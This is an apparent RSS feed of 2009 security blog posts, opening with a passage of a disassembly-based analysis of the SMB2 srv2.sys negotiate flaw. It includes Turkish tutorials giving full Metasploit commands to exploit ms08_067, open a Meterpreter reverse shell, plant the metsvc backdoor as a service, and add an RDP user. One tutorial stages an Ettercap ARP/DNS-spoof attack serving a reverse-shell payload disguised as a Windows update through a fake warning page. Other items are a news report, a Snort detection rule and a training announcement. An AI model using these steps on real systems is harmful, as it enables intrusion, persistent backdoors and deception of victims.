<p>Within the undocumented device extension, an array of no more than 4 pointers to objects created by SrvNetRegisterClient() is maintained.  These objects are allocated at the start of SrvNetRegisterClient():</p>
<pre>.text:00014BF9 push    6662534Ch       ; Tag</pre>
<pre>.text:00014BFE add     eax, 78h</pre>
<pre>.text:00014C01 push    eax             ; int</pre>
<pre>.text:00014C02 push    edi             ; PoolType</pre>
<pre>.text:00014C03 call    _SrvNetAllocatePoolWithTag@12 ; SrvNetAllocatePoolWithTag(x,x,x)</pre>
<pre>.text:00014C08 mov     ebx, eax</pre>
<pre>.text:00014C0A cmp     ebx,</pre>
<p>The pointer to the object is then added at the end of the array in the device extension:</p>
<pre>.text:00014D5B mov     ecx, _SrvNetDeviceExtension</pre>
<pre>.text:00014D61 mov     [ecx+esi*4+0DCh], ebx</pre>
<p>Each of these objects contains the function pointers shown when srv2.sys calls SrvNetRegisterClient():</p>
<pre>.text:00014C77 pop     ecx ; ECX = 9</pre>
<pre>.text:00014C78 lea     edi, [ebx+4Ch] ; EBX = DeviceExtension, ESI = arg_0 (pointer to base of function pointer list)</pre>
<pre>.text:00014C7B rep movsd ; move 9 DWORD objects from *ESI into *EDI</pre>
<p>The array roughly looks like this:</p>
<pre>0x4C : 8 byte LSA_UNICODE_STRING structure</pre>
<pre>0x54 : *SrvRegisterEndpoint()</pre>
<pre>0x58 : *SrvDeRegisterEndpoint()</pre>
<pre>0x5C : *SrvNegotiateHandler()</pre>
<pre>0x60 : *SrvConnectHandler()</pre>
<pre>0x64 : *SrvReceiveHandler()</pre>
<pre>.....</pre>
<p>Later in srvnet.sys, these routines will be called, for example within SrvNetCommonReceiveHandler():</p>
<pre>.text:00016477 loc_16477:</pre>
<pre>.text:00016477 movzx   eax, word ptr [ebp+var_8]</pre>
<pre>.text:0001647B mov     ecx, _SrvNetDeviceExtension</pre>
<pre>.text:00016481 lea     eax, [ecx+eax*4+0DCh]</pre>
<pre>.text:00016488 cmp     dword ptr [eax], 0</pre>
<pre>.text:0001648B jz      short loc_164B2</pre>
<pre>.text:00016495 push    [ebp+arg_14]</pre>
<pre>.text:00016498 mov     eax, [edi+70h]</pre>
<pre>.text:0001649B push    [ebp+arg_8]</pre>
<pre>.text:0001649E push    [ebp+arg_4]</pre>
<pre>.text:000164A1 push    dword ptr [ebx+eax*4+0CCh]</pre>
<pre>.text:000164A8 call    dword ptr [edi+5Ch] ; Call SrvNegotiateHandler() from DeviceExtension-&#62;CallbackArray</pre>
<pre>.text:000164AB test    eax, eax</pre>
<pre>.text:000164AD mov     [ebp+var_4], eax</pre>
<pre>.text:000164B0 jge     short loc_1</pre>
<p>The negotiate handler performs some validation, the most important of which is this check:</p>
<p>.text:0001602B cmp     byte ptr [eax+4], 72h ; EAX = SMB packet data<br />
.text:0001602F jnz     loc_160EC</p>
<p>This checks the second DWORD in the packet for the negotiate SMB command, which is 0&#215;72.  If this check fails, then the routine returns an error.</p>
<p>Continuing to follow the code down in SrvNetCommonReceiveHandler() inside of srvnet.sys, we see that shortly after the call to the SrvNegotiateHandler() callback, the pointer to SrvConnectHandler() is stored in a structure:</p>
<pre>.text:000164BE</pre>
<pre>.text:000164BE loc_164BE:              ;</pre>
<pre>.text:000164BE lea     eax, [edi+60h]  ;</pre>
<pre>.text:000164C1 mov     [esi+16Ch], eax ; SrvConnectHandler()</pre>
<pre>.text:000164C7 mov     eax, [edi+70h]</pre>
<pre>.text:000164CA mov     eax, [ebx+eax*4+0CCh]</pre>
<pre>.text:000164D1 mov     [esi+0A8h], eax</pre>
<pre>.text:000164D7 mov     eax, _pSrv2TraceInfo</pre>
<pre>.text:000164DC test    byte ptr [eax+0Ch], 1</pre>
<pre>.text:000164E0 jz      short loc_165</pre>
<p>This pointer is accessed again later within SrvNetCommandReceiveHandler():</p>
<pre>.text:000165D0 mov     [ebp+var_14], ax</pre>
<pre>.text:000165D4 mov     eax, [esi+16Ch]</pre>
<pre>.text:000165DA push    ebx</pre>
<pre>.text:000165DB call    dword ptr [eax] ; SrvConnectHandler()</pre>
<p>We then see it being used to call SrvReceiveHandler() shortly after:</p>
<pre>.text:00016687 loc_16687:</pre>
<pre>.text:00016687 push    [ebp+arg_20]</pre>
<pre>.text:0001668A mov     eax, [esi+16Ch]</pre>
<pre>.text:00016690 push    [ebp+arg_1C]</pre>
<pre>.text:00016693 mov     dword ptr [esi+8], 3</pre>
<pre>.text:0001669A push    [ebp+arg_14]</pre>
<pre>.text:0001669D push    [ebp+arg_C]</pre>
<pre>.text:000166A0 push    [ebp+arg_8]</pre>
<pre>.text:000166A3 push    [ebp+arg_4]</pre>
<pre>.text:000166A6 push    [ebp+arg_10]</pre>
<pre>.text:000166A9 push    dword ptr [edi]</pre>
<pre>.text:000166AB push    dword ptr [esi+0A8h]</pre>
<pre>.text:000166B1 call    dword ptr [eax+4] ; SrvReceiveHandler()</pre>
<p>This chain of function calls will be important when understanding how the data passes between the different routines in srv2.sys.</p>
<p>The srsv2.sys driver maintains an internal list of &#8220;service providers&#8221; that provide different services, including validation and execution.  This list is initialized in DriverStart() by calling Smb2ProviderRegister(), which calls another routine, SrvRegisterProvider(), which maintains a global list of providers within the driver.  The SrvRegisterProvider() routine takes the following structure in addition to a callback as arguments:</p>
<pre>.text:0001235B ; int __stdcall Smb2ProviderRegister() .text:0001235B _Smb2ProviderRegister@0 proc</pre>
<pre>.text:0001235B push    2</pre>
<pre>.text:0001235D push    3050h</pre>
<pre>.text:00012362 push    offset _Smb2ValidateProviderCallback@4 ; Smb2ValidateProviderCallback(x)</pre>
<pre>.text:00012367 push    offset _Smb2ValidateProviderName ; "Smb2Validate"</pre>
<pre>.text:0001236C call    _SrvRegisterProvider@16 ; SrvRegisterProvider(x,x,x,x</pre>
<pre>_Smb2ValidateProviderName:</pre>
<pre>.data:0002D164 _Smb2ValidateProviderName dw 18h        ; DATA XREF: Smb2ProviderRegister()+C o</pre>
<pre>.data:0002D166                 dw 18h</pre>
<pre>.data:0002D168                 dd offset aSmb2validate ; "Smb2Validate"</pre>
<p>The SrvRegisterProvider() routine is also responsible for the initialization of a 36-byte structure.  I didn&#8217;t reverse engineer the entire structure, but there are a few important offsets noted in the comments:</p>
<pre>.data:0002D138 _NullProvider   dw 0Ah                  ; DATA XREF: SrvInitializeProviderList() o</pre>
<pre>.data:0002D138                                         ; SrvCleanupProviderList()+D o</pre>
<pre>.data:0002D13A                 dw 0</pre>
<pre>.data:0002D13C                 dd 0DCh</pre>
<pre>.data:0002D140                 dw 24h</pre>
<pre>.data:0002D142                 dw 0</pre>
<pre>.data:0002D144                 dd 1</pre>
<pre>.data:0002D148                 dd offset _NullProviderName ; (struct ProviderName *)p_providerName</pre>
<pre>.data:0002D14C                 dd 0                    ; (struct Provider *)p_next</pre>
<pre>.data:0002D150                 db    0</pre>
<pre>.data:0002D151                 db    0</pre>
<pre>.data:0002D152                 db    0</pre>
<pre>.data:0002D153                 db    0</pre>
<pre>.data:0002D154                 dd 0FFFFFFFFh</pre>
<pre>.data:0002D158                 dd offset _NullProviderCallback@4 ; Provider callback routine</pre>
<p>The _NullProviderName is a pointer to a provider name structure similar to the one passed as an argument to _SrvRegisterProvider().  The NULL provider above (_NullProvider) is the first provider initialized by SrvInitializeProviderList() (and used in cleanup code); it is also the first entry in a linked list of provider structures.  The service provider list (_SrvProviderList) is first initialized with a pointer to this NULL entry.  Each call to _SrvRegisterProvider() will subsequently add a new entry to the end of the linked list.</p>
<p>At this point we understand that the provider which leads to the vulnerable code is going to be added to a linked list with the other 3 providers.  We can then move on to SrvProcessPacket() where we see this structure is accessed:</p>
<pre>PAGE:0002FA40 mov     eax, _SrvProviderList</pre>
<pre>PAGE:0002FA45 mov     [esi+15Ch], eax</pre>
<pre>PAGE:0002FA62</pre>
<pre>PAGE:0002FA62 loc_2FA62:              ;</pre>
<pre>PAGE:0002FA62 mov     eax, [esi+15Ch] ; EAX = &#38;cur_provider;</pre>
<pre>PAGE:0002FA68 mov     ecx, [eax+1Ch]</pre>
<pre>PAGE:0002FA6B test    [esi+158h], ecx</pre>
<pre>PAGE:0002FA71 jz      short loc_2FA7E</pre>
<pre>PAGE:0002FA73 push    esi</pre>
<pre>PAGE:0002FA74 call    dword ptr [eax+20h] ; cur_provider-&#62;CallBack()</pre>
<pre>PAGE:0002FA77 cmp     eax, STATUS_MORE_PROCESSING_REQUIRED</pre>
<pre>PAGE:0002FA7C jnz     short loc_2FA99</pre>
<pre>PAGE:0002FA7E</pre>
<pre>PAGE:0002FA7E loc_2FA7E:              ;</pre>
<pre>PAGE:0002FA7E mov     eax, [esi+15Ch] ; EAX = &#38;cur_provider</pre>
<pre>PAGE:0002FA84 mov     eax, [eax+14h]</pre>
<pre>PAGE:0002FA87 cmp     eax, edi        ; EDI = 0</pre>
<pre>PAGE:0002FA89 mov     [esi+15Ch], eax ; cur_provider = cur_provider-&#62;next</pre>
<pre>PAGE:0002FA8F jnz     short loc_2FA62</pre>
<p>The code above is initializing a variable with a pointer to the head of the linked list of providers (_NullProvider), then iterating through the list to discover if it needs to take action.  This is the point where the vulnerable routine is called.  The validation routine will first be called via Smb2ValidateProviderCallback(), and if more processing is required and no error occurs (which will be the case with most, if not all of the callbacks in the validation provider), STATUS_MORE_PROCESSING_REQUIRED will be returned and the next call will be to the _Smb2ExecuteProviderCallback() routine, which is the Smb2Execute provider that is registered after the validation provider.</p>
<p>The structure pointed to by ESI in the code above is heavily used throughout the code and wasn&#8217;t fully reversed.  It is a 0&#215;410 byte structure that is initialized by SrvAllocateWorkItemForConnection() and contains some data used to maintain the work queue.  At the base of the structure is a pointer to the actual data from the packet.</p>
<p>The SrvProcessPacket() routine will eventually be called by SrvReceiveHandler(), which was registered in the device extension array inside of srvnet.sys.  Once SrvProcessPacket() is called, the faulting routine will be reached after some more processing.  It is important to remember that this will only occur if SrvNegotiateHandler() is successful, meaning the SMB command must be 0&#215;72.</p>
<p>The vulnerable routine, Smb2ValidateProviderCallback(), begins by checking the first 4 bytes of the buffer for two different versions of the SMB header:</p>
<pre>.text:000172F8</pre>
<pre>.text:000172F8 loc_172F8:</pre>
<pre>.text:000172F8 mov     edx, [esi]</pre>
<pre>.text:000172FA cmp     edx, 'BMS¦'</pre>
<pre>.text:00017300 jz      short loc_17343</pre>
<pre>.text:00017302 cmp     edx, 424D53FFh ; BMS\xFF</pre>
<pre>.text:00017308 jnz     short loc_1731A</pre>
<p>The routine then proceeds down to perform various processing depending on what the version in the SMB header was, eventually pulling the WORD from the SMB packet and using it in the index as demonstrated earlier.</p>
<p>From:    <a href="http://www.secureworks.com/research/threats/windows-0day">http://www.secureworks.com/research/threats/windows-0day</a></p>
</div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Unleashed - Mastering The Framework]]></title>
<link>http://securitydown.wordpress.com/2009/10/01/metasploit-unleashed-mastering-the-framework/</link>
<pubDate>Thu, 01 Oct 2009 02:39:49 +0000</pubDate>
<dc:creator>Br3n0</dc:creator>
<guid>http://securitydown.wordpress.com/2009/10/01/metasploit-unleashed-mastering-the-framework/</guid>
<description><![CDATA[Um curso muito bom sobre o Metasploit (pra quem não sabe o que é o GOOGLE ajuda), que fala muita coi]]></description>
<content:encoded><![CDATA[Um curso muito bom sobre o Metasploit (pra quem não sabe o que é o GOOGLE ajuda), que fala muita coi]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit ile Backdoor Birakmak]]></title>
<link>http://pwnsauce.wordpress.com/2009/09/30/metasploit-ile-backdoor-birakmak/</link>
<pubDate>Wed, 30 Sep 2009 21:06:44 +0000</pubDate>
<dc:creator>IRQ</dc:creator>
<guid>http://pwnsauce.wordpress.com/2009/09/30/metasploit-ile-backdoor-birakmak/</guid>
<description><![CDATA[Meterpreter ile oturum actigimiz hedef sistemde Alexander Sotirov un metsvc backdoorunu nasil biraka]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>Meterpreter ile oturum actigimiz hedef sistemde Alexander Sotirov un <strong>metsvc</strong> backdoorunu nasil birakacagimizi gorecegiz.</p>
<p>Oncelikle backdooru karsiya atabilmek icin gerekli islemleri yapalim</p>
<p>terminali acip ;</p>
<blockquote><p>cd /tmp/</p></blockquote>
<blockquote><p>wget http://www.phreedom.org/software/metsvc/releases/metsvc-1.0.zip</p></blockquote>
<p>backdooru tmp klasorune indirdik.<!--more--></p>
<blockquote><p>mkdir msvc</p>
<p>cd /msvc/</p></blockquote>
<p>komutlari ile olusturdugumuz msvc klasorune geldik.</p>
<blockquote><p>unzip /tmp/metsvc-1.0.zip</p></blockquote>
<p>zipli dosyalari /tmp/ icerisine cikardik.</p>
<p>Bu dosyalar arasindan gerekli olan metsvc-server.exe , metsvc.exe ve framework/data icerisinden metsrv.dll dosyalarini /tmp/ klasorune asagidaki komutlarla atalim ;</p>
<blockquote><p>cp metsvc-1.0/metsvc-server.exe /tmp/metsvc-server.exe</p>
<p>cp metsvc-1.0/metsvc.exe /tmp/metsvc.exe</p>
<p>cp /pentest/exploits/framework3/data/meterpreter/metsrv.dll /tmp/metsrv.dll</p></blockquote>
<p>Metasploit kullanarak hedef sisteme eristik, ornek bir saldiri ;</p>
<p>Metasploit Framework 3 e konsol uzerinden eristik ,</p>
<blockquote><p>use exploit/windows/smb/ms08_067_netapi</p></blockquote>
<p>Burda use komutu ile exploit kullanilacagi tanimlaniyor windows/smb exploitin bulundugu kategoriler ve ms08_067_netapi exploiti tanimlaniyor. Bu windows/browser veya baska birseyde olabilir yukardaki sadece bir ornek.</p>
<p>Kullanilacak exploiti tanimladiktan sonra,</p>
<blockquote><p>show options</p></blockquote>
<p>komutu ile gerekli ayarlari gorebiliriz.Genel olarak ihtiyac duyulan 3 sey var ; hedef ile baglantimizi saglayacak olan<br />
PAYLOAD hedef RHOST saldirgan LHOST.Su sekilde tanimliyoruz ;</p>
<blockquote><p>set PAYLOAD windows/meterpreter/reverse_tcp</p>
<p>set LHOST X.Y.Z.D</p>
<p>set RHOST X.Y.Z.E</p></blockquote>
<p>Not: Sabit sekilde bu degerleri tanimlamak icin kullanabilecegimiz komut ;</p>
<blockquote><p>setg</p></blockquote>
<p>son olarak ;</p>
<blockquote><p>exploit</p></blockquote>
<p>komutu ile hedefi exploit ediyoruz.</p>
<p>Hedefte kullandigimiz acik mevcut ise acilan oturumda backdooru atmak icin WINDOWS icerisinde kendimize bir klasor olusturuyor ve daha once /tmp/ klasorune attigimiz gerekli dosyalari buraya upload ediyoruz.</p>
<blockquote><p>cd C:/WINDOWS</p>
<p>mkdir irq</p>
<p>cd irq</p>
<p>upload /tmp/metsvc.exe c:/WINDOWS/irq</p>
<p>upload /tmp/metsvc-server.exe c:/WINDOWS/irq</p>
<p>upload /tmp/metsrv.dll c:/WINDOWS/irq</p></blockquote>
<p>Kuruluma hazir hale geldi.<br />
Not : Upload komutunun kullanimi &#8220;upload yollanacak_dosya gidecegi_adres&#8221; seklinde.Bu asamada bir trojan upload edip hatta bunu &#8220;Startup&#8221; klasorune kopyalayip sistemin acilisinda baglanti saglayabiliriz.</p>
<blockquote><p>execute -f cmd -c</p>
<p>interact 1</p></blockquote>
<p>komutlari ile komut satirina erisiyor,</p>
<blockquote><p>cd C:/WINDOWS/irq</p>
<p>metsvc.exe install-service</p></blockquote>
<p>komutlari ile backdoorumuzu kuruyoruz.Metsvc nin bize baglanmasi icin multi handler i kullanacagiz.</p>
<p>Az once &#8220;use&#8221; komutu ile exploit tanimlamistik simdi ;</p>
<blockquote><p>back</p>
<p>use multi/handler</p></blockquote>
<p>komutlari ile multi handler i aktif ediyoruz.</p>
<p>Burda kullanacagimiz ayarlar sabit ;</p>
<blockquote><p>set PAYLOAD windows/metsvc_bind_tcp</p>
<p>set LPORT 31337</p>
<p>set RHOST X.Y.Z.E</p></blockquote>
<p>son olarak</p>
<blockquote><p>exploit</p></blockquote>
<p>komutunu kullandigimizda metsvc nin bize baglandigini gorebiliriz.</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit ile Uzak Masaüstü]]></title>
<link>http://pwnsauce.wordpress.com/2009/09/30/metasploit-ile-uzak-masaustu/</link>
<pubDate>Wed, 30 Sep 2009 20:21:23 +0000</pubDate>
<dc:creator>IRQ</dc:creator>
<guid>http://pwnsauce.wordpress.com/2009/09/30/metasploit-ile-uzak-masaustu/</guid>
<description><![CDATA[Metasploit ile hedef sistemi exploit edip oturum actik. Komutlar ile ugrasamam ben aradigim seyi Mou]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>Metasploit ile hedef sistemi exploit edip oturum actik. Komutlar ile ugrasamam ben aradigim seyi Mouse ile bulmak istiyorum derseniz Metasploit in Uzak Masaustu baglantisi kurmak icin kullanimi gayet basit bir ozelligi mevcut.</p>
<p>Meterpreter oturumunda ;</p>
<blockquote><p>run getgui -u irq -p irq</p></blockquote>
<p>komutu ile Uzak Masaustu baglantisi kurmak icin kullanici tanimliyoruz.<!--more--></p>
<p>-u = ile tanimladigimiz kullanici adi<br />
-p = ile tanimladigimiz sifre</p>
<p><img class="alignnone" title="SS" src="http://img260.imageshack.us/img260/7757/15259155.jpg" alt="" width="682" height="284" /></p>
<p>Kullaniciyi ekledikten sonra terminali acip ;</p>
<blockquote><p>rdesktop -u irq -p cigicigi 192.168.2.3</p></blockquote>
<p>komutu ile baglantiyi gerceklestiriyoruz.</p>
<p><img class="alignnone" title="SS" src="http://img19.imageshack.us/img19/4575/45211659.jpg" alt="" width="713" height="116" /></p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Back Track 4 ile Network Hacking]]></title>
<link>http://pwnsauce.wordpress.com/2009/09/30/back-track-4-ile-network-hacking/</link>
<pubDate>Wed, 30 Sep 2009 20:11:20 +0000</pubDate>
<dc:creator>IRQ</dc:creator>
<guid>http://pwnsauce.wordpress.com/2009/09/30/back-track-4-ile-network-hacking/</guid>
<description><![CDATA[MITM (Man in the Middle) saldirisi ve Ettercap in dns spoof eklentisini kullanarak hedef aldigimiz s]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>MITM (Man in the Middle) saldirisi ve Ettercap in dns spoof eklentisini kullanarak hedef aldigimiz sistemi ag uzerinden kendi web serverimiza yonlendirip zararli dosya bulastirmayi uygulayacagiz.</p>
<p>Oncelikle Dns gibi davranmak icin ip adresimizi ettercap in ayarlarinda tanimlayalim.</p>
<p>Terminali acip ;</p>
<blockquote><p>nano /usr/share/ettercap/etter.dns<!--more--></p></blockquote>
<p>komutu ile</p>
<blockquote><p>* A 192.168.2.2</p></blockquote>
<p>satir olarak tanimliyoruz varsa diger sunuculari silebilirsiniz.</p>
<p>Hedef ile baglantimizi saglayacak exe yi Metasploitin Msfpayload ozellgini kullanarak olusturuyoruz.Windows-KB174529-x86-ENU.exe ismi gercekligi yansitsin diye koydum kaydedecegi yer olarakta /var/www tanimladim bu komutu uygulamadan once web servisini Services/HTTPD/Start HTTPD altindan baslatiyoruz.</p>
<blockquote><p>cd /pentest/exploits/framework3</p>
<p>./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.2 X &#62; /var/www/Windows-KB174529-x86-ENU.exe</p></blockquote>
<p>Multi Handleri acip gerekli ayarlari yapiyoruz.</p>
<blockquote><p>./msfconsole</p>
<p>use exploit/multi/handler</p>
<p>set PAYLOAD windows/meterpreter/reverse_tcp</p>
<p>set LHOST 192.168.2.2</p>
<p>exploit</p></blockquote>
<p>Son olarak Ettercap ile saldiriya gecioyoruz ;</p>
<blockquote><p>ettercap -i wlan0 -T -q -P dns_spoof -M ARP /192.168.2.1/ /192.168.2.3/</p></blockquote>
<p>-i &#8221; ile internete bagli oldugum arayuzu tanimladim &#8220;wlan0&#8243;, kullandiginiz arayuzu ve ag gecidini ogrenmek icin komut satirina ;</p>
<blockquote><p>ifconfig</p></blockquote>
<p>yazmaniz yeterli.</p>
<p>Baglantiyi kendimize yonlendirdik. Web Serverimizdaki index dosyamizi duzenleyelim. /var/www/ icerisinde index.html dosyasini metin editor ile acip asagidaki kodlari yapistirip kaydedelim.</p>
<blockquote><p>&#60;html xmlns=&#8221;http://www.w3.org/1999/xhtml&#8221;&#62;<br />
&#60;head&#62;<br />
&#60;meta http-equiv=&#8221;Content-Type&#8221; content=&#8221;text/html; charset=utf-8&#8243; /&#62;<br />
&#60;title&#62;Windows Update&#60;/title&#62;<br />
&#60;style type=&#8221;text/css&#8221;&#62;<br />
&#60;!&#8211;<br />
.style {<br />
font-family: Arial, Helvetica, sans-serif;<br />
font-weight: bold;<br />
font-size: 24px;<br />
color: #9999999;<br />
}<br />
&#8211;&#62;<br />
&#60;/style&#62;<br />
&#60;/head&#62;<br />
&#60;body&#62;<br />
&#60;p align=&#8221;center&#8221;&#62;&#60;u&#62;Critical Vulnerability&#60;/&#62; in Windows Xp, Vista &#38; Windows 7 &#60;br /&#62;Download and Installation of upgrade required.&#60;/&#62;<br />
&#60;p align=&#8221;center&#8221;&#62;<br />
&#60;input align=&#8221;center&#8221; type=&#8221;button&#8221; value=&#8221;Download Update&#8221;<br />
onClick=&#8221;window.open(&#8216;/Windows-KB174529-x86-ENU.exe&#8217;,'download&#8217;); return false;&#8221;&#62;&#60;/p&#62;<br />
&#60;/body&#62;<br />
&#60;/html&#62;</p></blockquote>
<p>Goruntusu su sekilde ;</p>
<p><img class="alignnone" title="SS" src="http://img121.imageshack.us/img121/2504/52711311.jpg" alt="" width="691" height="106" /></p>
<p>Hedef browseri acip herhangi bir web sitesini ziyaret etmek istediginde bu sayfa ile karsilasacak.Download Update e tiklayip indirdigi dosyayi calistirdigi anda Multi Handler ile baglanti gerceklesecek.</p>
<p>Bu baglantiyi kalici kilmak icin ;</p>
<p><a href="http://pwnsauce.wordpress.com/2009/09/30/metasploit-ile-backdoor-birakmak/" target="_self">Metasploit ile Kalici Backdoor Birakmak</a><br />
Saldirida kullandigimiz adresler ;</p>
<p>192.168.2.1 = Ag Gecidi<br />
192.168.2.2 = Saldirgan<br />
192.168.2.3 = Hedef</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Se hace público un exploit para una brecha crítica en Windows]]></title>
<link>http://vulnerabilityteam.wordpress.com/2009/09/30/se-hace-publico-un-exploit-para-una-brecha-critica-en-windows/</link>
<pubDate>Wed, 30 Sep 2009 09:39:13 +0000</pubDate>
<dc:creator>komz</dc:creator>
<guid>http://vulnerabilityteam.wordpress.com/2009/09/30/se-hace-publico-un-exploit-para-una-brecha-critica-en-windows/</guid>
<description><![CDATA[Se ha hecho público un nuevo código de ataque que explota una brecha crítica en el sistema operativo]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p style="text-align:justify;">Se ha hecho público un nuevo código de ataque que explota una brecha crítica en el sistema operativo Windows, presionando así a Microsoft para que cubra la vulnerabilidad antes de que el problema llegue a provocar una epidemia de gusanos informáticos.</p>
<p style="text-align:justify;">La vulnerabilidad se conocía desde el 7 de septiembre, pero los programas públicamente disponibles hasta el momento que permitían aprovecharla para atacar a los PC no tenían más consecuencia que bloquear el funcionamiento de Windows. Ahora, sin embargo, un nuevo ataque desarrollado por Stephen Fewer, investigador senior de Harmony Security permite a los atacantes correr software no autorizado sobre las máquinas, generando un problema más serio. <strong>El código de Fewer ha sido añadido al kit de testing de penetración open source Metasploit.</strong></p>
<p style="text-align:justify;">Hace dos semanas, otra compañía, denominada Immunity, desarrolló su propio código de ataque para esta brecha, pero sólo lo facilitó a sus suscriptores de pago. Por el contrario, el de Metasploit puede ser descargado por cualquier interesado.</p>
<p style="text-align:justify;">Este último software de explotación funciona sobre Windows Vista Service Pack 1 y 2, así como sobre el servidor Windows 2008 SP1 y Windows 2008 Service Pack 2. A diferencia de Conficker, sin embargo, no afecta a Windows XP, Windows Server 2003 y Windows 2000.</p>
<p style="text-align:justify;">La vulnerabilidad que explota ha sido ya resuelta en Windows 7, pero de momento no se sabe si Microsoft tendrá listo el parche correspondiente para las versiones de su sistema operativo afectadas a tiempo de incluirlo en su próximo boletín mensual de seguridad, que será emitido el próximo 13 de octubre.</p>
<p><em>fuente: csospain.es</em></p>
<p><em><a href="http://vulnerabilityteam.wordpress.com/files/2009/09/exploit.gif"><img class="alignleft size-full wp-image-5075" title="exploit" src="http://vulnerabilityteam.wordpress.com/files/2009/09/exploit.gif" alt="exploit" width="294" height="147" /></a><br />
</em></p>
<p><em><br />
</em></p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit SMB2.0 exploit detection rule]]></title>
<link>http://snortrules.wordpress.com/2009/09/30/metasploit-smb2-0-exploit-detection-rule/</link>
<pubDate>Wed, 30 Sep 2009 08:54:17 +0000</pubDate>
<dc:creator>kimms17</dc:creator>
<guid>http://snortrules.wordpress.com/2009/09/30/metasploit-smb2-0-exploit-detection-rule/</guid>
<description><![CDATA[alert any any -&gt; any 445 (flow:established, to_server; content:”|00000352ff534d4272000000001853c8]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>alert any any -&#62; any 445 (flow:established, to_server; content:”&#124;00000352ff534d4272000000001853c81702&#124;”; offset:0; depth:18)</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Offensive Security Releases Free Online Information Security Training to Benefit Charity ]]></title>
<link>http://tweetycoaster.wordpress.com/2009/09/23/offensive-security-releases-free-online-information-security-training-to-benefit-charity/</link>
<pubDate>Wed, 23 Sep 2009 02:47:32 +0000</pubDate>
<dc:creator>tweetycoaster</dc:creator>
<guid>http://tweetycoaster.wordpress.com/2009/09/23/offensive-security-releases-free-online-information-security-training-to-benefit-charity/</guid>
<description><![CDATA[Offensive Security, the leading information security training company, along with the community behi]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p><a href="http://tweetycoaster.wordpress.com/files/2009/09/logo-00.png"><img class="aligncenter size-full wp-image-656" title="logo-00" src="http://tweetycoaster.wordpress.com/files/2009/09/logo-00.png" alt="logo-00" width="450" height="222" /></a>Offensive Security, the leading information security training company, along with the community behind BackTrack, the worlds leading penetration testing toolset, are proud to announce a brand new free online information security training based on the popular exploitation framework, Metasploit.  North Carolina (PRWEB) September 21, 2009 &#8212; The long awaited course entitled <a href="http://www.offensive-security.com/metasploit-unleashed/" target="_blank">Metasploit Unleashed</a> has been released today from the online Information Security training experts, Offensive Security. From the time when Metasploit was released in 2003, it has become one of the single most useful information security tool freely available to security professionals today.  From a wide array of commercial grade exploits and an extensive exploit development environment, all the way to network information gathering tools and web vulnerability plug-ins. The Metasploit Framework (MSF) provides a truly impressive environment for IT security Professionals. The MSF is far more than just a collection of exploits &#8211; it&#8217;s an infrastructure that one can build upon and utilize for custom needs. This allows the user to concentrate on their unique environment, and not have to reinvent the wheel.  However, for a long time there has been a gap in good, approachable and affordable information security training for the Metasploit Framework. With little to no resources, it was too easy to overlook many of the strong and powerful features that this tool provides. That is all about to change with the introduction of this new free online information security training course.  Offensive Security is supporting this free course with the first official certification for Metasploit and videos that can be optionally purchased. All proceeds from this will be given to Hackers for Charity to help underprivileged children in East Africa. Through a heart-warming effort by several security professionals, we are proud to present the most complete and in-depth open course about the Metasploit Framework.  Chris Hadnagy, lead social engineer from social-engineer.org says, &#8220;What Offensive Security and the security community has created here is truly an information security work of art and the fact that all of this is for charity, makes it especially heartwarming.&#8221;  This course will cover from the basics of MSF usage, client side attacks, social engineering attacks, egghunter mixins, extending the framework and much more. The course walks the student from setting up the lab right down to performing every exploit and truly Mastering the Framework. It will prove to change the way people view the Metasploit Framework.</p>
<p>source : <a href="http://www.prweb.com/releases/information-security/metasploit/prweb2912704.htm" target="_blank">http://www.prweb.com/releases/information-security/metasploit/prweb2912704.htm</a></p>
</div>]]></content:encoded>
</item>

</channel>
</rss>
